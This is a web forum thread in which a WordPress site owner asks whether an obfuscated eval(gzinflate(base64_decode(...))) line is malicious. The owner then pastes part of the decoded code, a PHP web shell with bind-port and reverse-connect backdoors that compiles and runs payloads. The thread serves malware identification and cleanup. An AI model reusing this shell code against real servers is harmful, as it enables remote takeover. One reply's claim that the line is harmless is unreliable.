Is this Malicious code?

Is this line of code safe:

@eval(gzinflate(base64_decode($code)));

I found it in one of my wordpress files...
checkmofoshodunoAsked:
Who is Participating?

[Webinar] Streamline your web hosting managementRegister Today

x
 
Phil PhillipsConnect With a Mentor Director of DevOps & Quality AssuranceCommented:
Roads_Roads brings up a very good point.  You may want to run your site logs through something like OSSEC.

Also, here are some additional tips on how to make Wordpress more secure:
http://codex.wordpress.org/Hardening_WordPress

And, here's a few blog posts that discuss how to recover from a hacked Wordpress installation (hopefully, your installation isn't fully compromised, but these links also have additional security tips):
http://www.snipe.net/2010/01/when-wordpress-gets-hacked/
http://codex.wordpress.org/FAQ_My_site_was_hacked
http://ocaoimh.ie/did-your-wordpress-site-get-hacked/
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

In addition to that, you should still consider disabling eval (see my earlier comment), if you can.
0
 
eaglerodCommented:
No this is not malicious code.

The 'Code' represents the scrambled code (aka encoded text, aka obfuscated code) containing random letters, numbers and/or characters.
0
 
checkmofoshodunoAuthor Commented:
How can i check to see what the code actually is when its decoded?
0
Hire Technology Freelancers with Gigs

Work with freelancers specializing in everything from database administration to programming, who have proven themselves as experts in their field. Hire the best, collaborate easily, pay securely, and get projects done right.

 
Phil PhillipsDirector of DevOps & Quality AssuranceCommented:
I'm pretty sure that is malicious.  In fact, from what I can tell, eval(base64_decode(…)) is a common way of 'hacking' Wordpress.

If you have the Suhosin patch, you might want to even consider disabling eval():
http://www.hardened-php.net/suhosin/configuration.html#suhosin.executor.disable_eval
0
 
eaglerodCommented:
I believe this is what you are looking for.

Decoding Information
0
 
Jason C. LevineNo oneCommented:
Hi checkmofoshoduno,

It's probably code for an advertising link or something similar that some theme developers embed into the theme.  It may not be malicious, but it may be something you don't want there either.

I would find the $code variable and get the string and run it through a decoder, either on another site such as:

http://www.tareeinternet.com/forum/knowledgebase/274-decoding-eval-gzinflate-base64_decode.html

or just as a simple echo statement in a PHP file you create.
0
 
m_walkerCommented:
@eval(gzinflate(base64_decode($code)));

try
$Temp = gzinflate(base64_decode($code));
echo $Temp;

Note sure where $code gets its value from.
The code could be binary, so expect some weird results.
0
 
checkmofoshodunoAuthor Commented:
Yep i managed to also find that link for the decoder and unless that site is messing with me i am seeing the output say "Load and Exploit" and a bunch of other not so good things such as Port Binding

Looks like i will just remove that block of code for now...

Please see attached.
Process found running, backdoor setup successfully.

"; } else { $msg = "

Process not found running, backdoor not setup successfully.
"; } } elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdp",$port_bind_bd_pl); exe("chmod 777 bdp"); $p2=which("perl"); exe($p2." bdp ".$port." &"); $scan = exe("ps aux"); if(eregi("$p2 bdp $port",$scan)){ $msg = "

Process found running, backdoor setup successfully.
"; } else { $msg = "

Process not found running, backdoor not setup successfully.
"; } } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcc.c",$back_connect_c); exe("gcc -o bcc bcc.c"); exe("chmod 777 bcc"); @unlink("bcc.c"); exe("./bcc ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcp",$back_connect); exe("chmod +x bcp"); $p2=which("perl"); exe($p2." bcp ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd'])) { $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']); $namafile = download($pilihan,$wurl); if(is_file($namafile)) { $msg = exe($wcmd); } else $msg = "error: file not found $namafile"; } ?>

Open in new window

0
 
Lukasz ChmielewskiCommented:
The additional question - how did it get there ? Change your access passwords to strong ones and do not store them locally on your computer.
0
 
Jason C. LevineNo oneCommented:
It's not necessarily a hack on the site.  I have seen code like this included in many, many free WordPress themes by the theme author.  If you are downloading free stuff directly from an author's web site (and not the WordPress site) make sure you go over it very carefully for exploits.
0
All Courses

From novice to tech pro — start learning today.